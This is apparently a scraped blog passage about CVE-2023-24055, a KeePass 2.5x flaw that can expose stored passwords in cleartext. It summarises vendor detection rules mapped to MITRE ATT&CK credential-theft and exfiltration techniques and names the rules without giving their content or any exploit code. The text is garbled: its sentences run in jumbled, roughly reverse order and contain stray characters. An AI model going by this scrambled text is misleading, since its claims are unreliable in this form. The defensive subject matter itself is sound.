Suspicious Powershell Strings (via powershell)Ĭall Suspicious. The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline) The detections are compatible with 22 SIEM, EDR, and XDR platforms and are aligned with the MITRE ATT&CK® framework v12, addressing the Initial Credential Access and Exfiltration tactics with Credentials from Password Stores (T1555) and Exfiltration Over Web Service (T1567) as the corresponding techniques.Īlso, to detect the malicious activity associated with potential CVE-2023-24055 exploitation, SOC Prime Team highly recommends applying the detection rules listed below: This code might be modified by adversaries to avoid detection and proceed with the attack while flying under the radar. Possible KeePass Exploitation Patterns (via powershell)īoth rules above detect exploitation patterns related to the KeePass vulnerability in the spotlight and are based on the CVE-2023-24055 PoC exploit code. Possible KeePass Exploitation Patterns (via cmdline) To proactively detect malicious activity associated with CVE-2023-24055 exploitation, SOC Prime’s Detection as Code Platforms offers a batch of dedicated Sigma rules. With proof-of-concept (PoC) exploit available, and in view that KeePass is one of the most popular password managers globally, existing security glitch is a juicy target for attackers. A security flaw, tracked as CVE-2023-24055, might affect KeePass version 2.5x, potentially allowing attackers to obtain stored passwords in cleartext. Stay alert! Security researchers have discovered a notorious vulnerability posing a serious threat to users of a popular password manager KeePass.
0 Comments
Leave a Reply. |